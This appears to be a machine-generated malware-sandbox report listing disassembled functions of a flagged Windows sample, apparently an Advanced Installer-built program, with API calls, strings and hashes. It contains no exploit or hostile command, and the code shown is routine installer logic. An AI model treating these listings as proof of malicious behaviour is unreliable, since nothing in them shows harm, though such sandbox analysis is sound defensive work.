                                                      • Part of subcall function 0051FA13: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 0051FA1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
                                                    • String ID: AXWIN UI Window$Kc
                                                    • API String ID: 213679520-708131849
                                                    • Opcode ID: 2637d9cb892e5ac1257ca4287020e16684127af50bcf11136bc280a887d701d2
                                                    • Instruction ID: ef7869105d92ea39b139a65368c10bdc9b0d89fed744bbb0d569c46e35467568
                                                    • Opcode Fuzzy Hash: 2637d9cb892e5ac1257ca4287020e16684127af50bcf11136bc280a887d701d2
                                                    • Instruction Fuzzy Hash: 8551E675604305AFDB11CF58DD08BAABBF9FF98714F11812AFD14A7280D771A814CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0063948C,00000000,D13B3340,00000000,00584033,000000FF,?,D13B3340), ref: 00352853
                                                    • GetLastError.KERNEL32(?,D13B3340), ref: 0035285D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                    • String ID: <Y\$VolumeCostDifference$VolumeCostRequired$VolumeCostVolume$dY\
                                                    • API String ID: 439134102-1117542048
                                                    • Opcode ID: a864668cd8275da4a404885757543bf85b8429f721b8a04e58952ac82683c20c
                                                    • Instruction ID: b35fcf1ca01de8102cfdc7d4010b35f93fa5b056c275033ee5aa912c3715ab93
                                                    • Opcode Fuzzy Hash: a864668cd8275da4a404885757543bf85b8429f721b8a04e58952ac82683c20c
                                                    • Instruction Fuzzy Hash: C551D7B1900619DFDB01CFA4EC09B9E7BF9FB09715F004229D815A7391E7B5A509CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?), ref: 004B35C0
                                                    • LoadLibraryW.KERNEL32(Shell32.dll), ref: 004B35D3
                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004B35E3
                                                    • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 004B366C
                                                    • SHGetMalloc.SHELL32(?), ref: 004B36AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
                                                    • String ID: SHGetSpecialFolderPathW$Shell32.dll
                                                    • API String ID: 2352187698-2988203397
                                                    • Opcode ID: 9663a2d5292275a2955869ef08736245948a773ca0ab9a0c553a06fe385c1eaf
                                                    • Instruction ID: aebc576bb8327bb99b5b8980200f3b041540be6ba795fcc9a94d511d2dc60686
                                                    • Opcode Fuzzy Hash: 9663a2d5292275a2955869ef08736245948a773ca0ab9a0c553a06fe385c1eaf
                                                    • Instruction Fuzzy Hash: EE31D571600701ABDB309F29DC49BA777F5BFD4702F44842EE885873D0EB7599468BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 0037007A
                                                    • GetWindow.USER32(?,00000005), ref: 00370087
                                                    • GetWindow.USER32(00000000,00000002), ref: 003701C2
                                                      • Part of subcall function 0036FED0: GetWindowRect.USER32(?,?), ref: 0036FEFC
                                                      • Part of subcall function 0036FED0: GetWindowRect.USER32(?,?), ref: 0036FF0C
                                                    • GetWindowRect.USER32(?,?), ref: 0037011B
                                                    • GetWindowRect.USER32(00000000,?), ref: 0037012B
                                                    • GetWindowRect.USER32(00000000,?), ref: 00370145
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect
                                                    • String ID:
                                                    • API String ID: 3200805268-0
                                                    • Opcode ID: 51520fbb3bc9b7593171b1527b5568d8c633cb364bfdf6f09dcf5071573fc065
                                                    • Instruction ID: bffb481bb724897bb9c8e7d8e8ebbbabfb2e91469b04f9b37fc89d0cc1c6c1b9
                                                    • Opcode Fuzzy Hash: 51520fbb3bc9b7593171b1527b5568d8c633cb364bfdf6f09dcf5071573fc065
                                                    • Instruction Fuzzy Hash: 04419C30504700DFC326DF29C980A6BF7EABF96704F518A1DF08996521EB35E988CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: FTP Server$GET$HTTP/1.0$Local Network Server$[mT$emT$qpT
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8D5
                                                    • HeapAlloc.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8DC
                                                      • Part of subcall function 0051F9A7: IsProcessorFeaturePresent.KERNEL32(0000000C,0051F8C3,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9A9
                                                    • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F8EC
                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F913
                                                    • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F927
                                                    • InterlockedPopEntrySList.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F93A
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F94D
                                                    Similarity
                                                    • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                    • String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0041E7C5
                                                    • __Init_thread_footer.LIBCMT ref: 0041E891
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: AI_FRAME_NO_CAPTION_$Dialog$Pu[$`Dialog` = '
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,D13B3340), ref: 0036D3B1
                                                    • GetLastError.KERNEL32 ref: 0036D3DA
                                                    • RegCloseKey.ADVAPI32(?,005B329C,00000000,005B329C,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 0036D64E
                                                    • CloseHandle.KERNEL32(?,D13B3340,?,?,00000000,0054C7CD,000000FF,?,005B329C,00000000,005B329C,00000000,?,80000001,00000001,00000000), ref: 0036D6DE
                                                    Strings
                                                    • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 0036D412
                                                    • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 0036D3A6
                                                    Similarity
                                                    • API ID: Close$CreateErrorEventHandleLast
                                                    • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 0036545A
                                                    • SysFreeString.OLEAUT32(00000000), ref: 003654A6
                                                    • SysFreeString.OLEAUT32(00000000), ref: 003654C8
                                                    • SysFreeString.OLEAUT32(00000000), ref: 00365623
                                                    Similarity
                                                    • API ID: String$Free$Alloc
                                                    • String ID: >R6$>R6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SysFreeString.OLEAUT32(00000000), ref: 00360814
                                                    • SysFreeString.OLEAUT32(00000000), ref: 00360889
                                                    • GetProcessHeap.KERNEL32(?,?), ref: 003608F9
                                                    • HeapFree.KERNEL32(00000000,?,?), ref: 003608FF
                                                    • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,D13B3340,005CADDC,00000000), ref: 0036092C
                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,D13B3340,005CADDC,00000000), ref: 00360932
                                                    • SysFreeString.OLEAUT32(00000000), ref: 0036094A
                                                    Similarity
                                                    • API ID: Free$Heap$String$Process
                                                    • String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,005848ED,000000FF,?,0046C8E6,?), ref: 0046C673
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • RemoveDirectoryW.KERNEL32(?,D13B3340,?,?,?,?,005848ED,000000FF,?,0046C8E6,?,00000000), ref: 0046C6A2
                                                    • GetLastError.KERNEL32(?,D13B3340,?,?,?,?,005848ED,000000FF,?,0046C8E6,?,00000000), ref: 0046C6B2
                                                    • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,005848ED,000000FF,?,80004005,D13B3340,?), ref: 0046C783
                                                    • GetLastError.KERNEL32(?,?,?,00000000,005848ED,000000FF,?,80004005,D13B3340,?,?,?,?,005848ED,000000FF), ref: 0046C7C2
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Similarity
                                                    • API ID: DirectoryErrorInit_thread_footerLastRemove$DeleteFileFindHeapProcessResource
                                                    • String ID: \\?\
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,00482271,?,D13B3340,?,?), ref: 00476E9B
                                                    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00476EB1
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00476EEA
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00482271,?,D13B3340,?,?), ref: 00476F06
                                                    Similarity
                                                    • API ID: Library$Free$AddressLoadProc
                                                    • String ID: DllGetVersion$Shlwapi.dll
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0044BEF0: __Init_thread_footer.LIBCMT ref: 0044BF80
                                                      • Part of subcall function 0044BEF0: GetProcAddress.KERNEL32(SetWindowTheme), ref: 0044BFBD
                                                      • Part of subcall function 0044BEF0: __Init_thread_footer.LIBCMT ref: 0044BFD4
                                                      • Part of subcall function 0044BEF0: SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 0044BFFF
                                                    • CreateWindowExW.USER32(80000000,SysListView32,?,00000000,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044BA32
                                                    • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0044BA50
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 0044BA58
                                                      • Part of subcall function 003672B0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 003672E6
                                                    Similarity
                                                    • API ID: MessageSend$Init_thread_footerWindow$AddressCreateLongProc
                                                    • String ID: Ao7$SysListView32$Kc
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0051D249,0051D1AC,0051D44D), ref: 0051D1E5
                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0051D1FB
                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0051D210
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                    • API String ID: 667068680-1718035505
                                                    • Opcode ID: 6b71de4b37fc4321adbafd7866e1692b4edc9680de8d2ab8b6fbdf41023afbb1
                                                    • Instruction ID: 9695e0a8712c1e3cf17b3403ae049f37ec852ba409cf0569de569447dcdfc4d5
                                                    • Opcode Fuzzy Hash: 6b71de4b37fc4321adbafd7866e1692b4edc9680de8d2ab8b6fbdf41023afbb1
                                                    • Instruction Fuzzy Hash: E7F0A476B81212AB6B215F645C98ABA7FE87A1B3513140539ED71D2240DE34CCC8D6B0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D13B3340,?,?,00000000,005A5D89,000000FF,?,0052B589,?,?,0052B55D,?), ref: 0052B62E
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0052B640
                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,005A5D89,000000FF,?,0052B589,?,?,0052B55D,?), ref: 0052B662
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$`{5$mscoree.dll
                                                    • API String ID: 4061214504-2791440910
                                                    • Opcode ID: 5134470176e7afb713da60a6f4f73794b45baa22f8a30c340b38ed507681c166
                                                    • Instruction ID: 3e7061836f9a297b9c7aad8d8aaeecdc1263cfa41e0b207ee2b09699f6a3c4e0
                                                    • Opcode Fuzzy Hash: 5134470176e7afb713da60a6f4f73794b45baa22f8a30c340b38ed507681c166
                                                    • Instruction Fuzzy Hash: 3E016235940625EFDB119B51DC09FBEBFB8FF05B11F000626F911A22E0DB74A904CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(?,00000318,00000000,00000004), ref: 003869D7
                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 003869FF
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00386A17
                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 00386A48
                                                    • GetParent.USER32(?), ref: 00386B24
                                                    • SendMessageW.USER32(00000000,00000136,?,?), ref: 00386B35
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Parent
                                                    • String ID:
                                                    • API String ID: 1020955656-0
                                                    • Opcode ID: 37d195850a36538d3b008e6867072cd58450668476681f60cffb597998213461
                                                    • Instruction ID: 0fe50f21769a1fb744bd429744d4cbcbfc5b33e387008694c457c4cb0148ff7f
                                                    • Opcode Fuzzy Hash: 37d195850a36538d3b008e6867072cd58450668476681f60cffb597998213461
                                                    • Instruction Fuzzy Hash: 4E613EB1904218AFDB219FE4DD49FAEBBB9FF48711F104159F605AB2A0CB756A01CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00521ADA,00521AA6,?,?,0038B0CD,0046B340,?,00000008), ref: 00521AF1
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00521AFF
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00521B18
                                                    • SetLastError.KERNEL32(00000000,00521ADA,00521AA6,?,?,0038B0CD,0046B340,?,00000008), ref: 00521B6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: fb0ccda481be76595e7ed3504202fa8b6771d9706a886860360426f3f7fbb4ea
                                                    • Instruction ID: a16c79a55e317ce48a1b975cbda2e016dc3f090f2f6eb5b70de13ca44016053f
                                                    • Opcode Fuzzy Hash: fb0ccda481be76595e7ed3504202fa8b6771d9706a886860360426f3f7fbb4ea
                                                    • Instruction Fuzzy Hash: 7501F732209B325EA7282B74BC89A277F69FF737B4B200329F610972E0FF115C045988
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _wcsrchr.LIBVCRUNTIME ref: 004B1154
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • DeleteFileW.KERNEL32(?), ref: 004B11FA
                                                    • _wcsrchr.LIBVCRUNTIME ref: 004B1269
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 004B132F
                                                      • Part of subcall function 00470270: LoadStringW.USER32(000000A1,?,00000514,D13B3340), ref: 004701D6
                                                    Strings
                                                    • --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 004B11AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DeleteFileInit_thread_footer_wcsrchr$HeapLoadProcessString
                                                    • String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
                                                    • API String ID: 2702461799-3685554107
                                                    • Opcode ID: a49db74d529a1556c347024470678718233a1b9905dbf4b6d5385e2b268edcd4
                                                    • Instruction ID: 6a4249d45cf238a2f7d94059e57e7a4fbeb6435f1e3a22e3b113f2ffcc3aad87
                                                    • Opcode Fuzzy Hash: a49db74d529a1556c347024470678718233a1b9905dbf4b6d5385e2b268edcd4
                                                    • Instruction Fuzzy Hash: C1919131A006059FDB00DF68C858B9EBBF5FF55325F14829AE815DB3A2EB35D904CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(?,SysTabControl32,?,46010000,?,?,?,?,00000000,00000309,00000000), ref: 0038685D
                                                    • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00386872
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 0038687A
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 003884B0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003884FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$AllocateCreateHeapWindow
                                                    • String ID: SysTabControl32$TabHost
                                                    • API String ID: 2359350451-2872506973
                                                    • Opcode ID: 8cfe0538c0190a8193f0647d1352b9be1195f21f3bd2a5119c9da010ef3adc2c
                                                    • Instruction ID: cecd02885973cb2eacf57fcfd00d137f9d4d3c7d6d9a8cdf4f0824adb33439cc
                                                    • Opcode Fuzzy Hash: 8cfe0538c0190a8193f0647d1352b9be1195f21f3bd2a5119c9da010ef3adc2c
                                                    • Instruction Fuzzy Hash: FA51BD31A00605AFDB10DF68C845BAABBF5FF49310F104669F805AB3A0DB34A904CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,D13B3340,76B25870,00000000), ref: 004A0D82
                                                    • CloseHandle.KERNEL32(?,D13B3340,00000000,?,00000000,00592143,000000FF,?), ref: 004A0F00
                                                    • CloseHandle.KERNEL32(00000000,D13B3340,00000000,?,00000000,00592143,000000FF,?), ref: 004A0F2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$FileModuleName
                                                    • String ID: <3[$LOG
                                                    • API String ID: 3884789274-4127936693
                                                    • Opcode ID: 9418a78490da8f38d52e0cb0a7abfd1d936e8d7a6b7f1c589c3fdefb984bc86c
                                                    • Instruction ID: 5d2aed45bd0d07a203479c0c6b18bd7ce73d7ebce5806c9bcc311b04c03f797a
                                                    • Opcode Fuzzy Hash: 9418a78490da8f38d52e0cb0a7abfd1d936e8d7a6b7f1c589c3fdefb984bc86c
                                                    • Instruction Fuzzy Hash: E051D271A003449FDB24DF68C809BABBBF5FF55710F144A2AE816DB790E778AA04C784
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 0046E1F7
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0046E213
                                                    • GetExitCodeProcess.KERNEL32 ref: 0046E224
                                                    • CloseHandle.KERNEL32(00000000), ref: 0046E232
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
